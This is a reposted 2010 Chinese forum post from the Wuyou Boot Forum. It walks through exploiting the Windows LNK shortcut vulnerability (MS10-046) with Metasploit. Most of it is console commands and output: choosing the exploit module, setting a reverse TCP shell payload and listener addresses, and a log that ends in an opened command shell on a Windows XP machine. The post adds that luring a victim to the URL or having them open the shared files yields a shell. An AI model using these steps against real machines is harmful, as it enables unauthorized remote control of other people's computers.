无忧启动论坛

标题: [转载]微软lnk漏洞实战演练 [打印本页]

作者: ones 时间: 2010-8-17 20:54
标题: [转载]微软lnk漏洞实战演练
下载最新版“Metasploit Framework”溢出工具，内包含lnk漏洞利用文件。
Metasploit Framework官网：http://www.metasploit.com

msf > search lnk #查找lnk漏洞利用文件，如果不是最新版请使用svn update更新。

Searching loaded modules for pattern lnk...
Exploits
========
Name                                              Rank    Description
----                                              ----    -----------
windows/browser/ms10_046_shortcut_icon_dllloader excellent  Microsoft Windows Shell LNK Code Execution
msf > use windows/browser/ms10_046_shortcut_icon_dllloader    #选择漏洞利用文件
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/shell/reverse_tcp #为漏洞加入ShellCode
payload => windows/shell/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.12.110
lhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.12.110
srvhost => 192.168.12.110
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options:
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
SRVHOST  192.168.12.110 yes    The local host to listen on.
SRVPORT  80             yes    The daemon port to listen on (do not change)
UNCHOST                no       The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH  /             yes    The URI to use (do not change).

Payload options (windows/shell/reverse_tcp):
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
EXITFUNC  process       yes    Exit technique: seh, thread, process
LHOST    192.168.12.110 yes    The listen address
LPORT    4444          yes    The listen port

Exploit target:
Id  Name
--  ----
0 Automatic

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

Exploit running as background job.
msf exploit(ms10_046_shortcut_icon_dllloader) >

Started reverse handler on 192.168.12.110:4444

Send vulnerable clients to \\192.168.12.110\LjWqptMQY\.

Or, get clients to save and render the icon of http://<your host>/<anything>.lnk

Using URL: http://192.168.12.110:80/

Server started.
现在只要在对方浏览器中输入http://192.168.12.110:80或将\\192.168.12.110\LjWqptMQY\下的两个文件放入其他机器中，只需要用资源管理器打开就会访问Shell。

Sending UNC redirect to 192.168.12.110:4611 ...

Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY

Sending 301 for /LjWqptMQY ...

Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY/

Sending directory multistatus for /LjWqptMQY/ ...

Responding to WebDAV OPTIONS request from 192.168.12.110:4624

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY

Sending 301 for /LjWqptMQY ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/

Sending directory multistatus for /LjWqptMQY/ ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY

Sending 301 for /LjWqptMQY ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/

Sending directory multistatus for /LjWqptMQY/ ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY

Sending 301 for /LjWqptMQY ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/

Sending directory multistatus for /LjWqptMQY/ ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/desktop.ini

Sending 404 for /LjWqptMQY/desktop.ini ...

Sending LNK file to 192.168.12.110:4624 ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.manifest

Sending 404 for /LjWqptMQY/PUcA.dll.manifest ...

Sending DLL payload 192.168.12.110:4624 ...

Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.123.Manifest

Sending 404 for /LjWqptMQY/PUcA.dll.123.Manifest ...

Sending stage (240 bytes) to 192.168.12.110

Command shell session 1 opened (192.168.12.110:4444 -> 192.168.12.110:4625) at 2010-08-14 10:10:13 +0800
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1

Starting interaction with 1...
C:\Documents and Settings\test\桌面>

Microsoft Windows XP [版本 5.1.2600]

欢迎光临无忧启动论坛 (http://bbs.c3.wuyou.net/)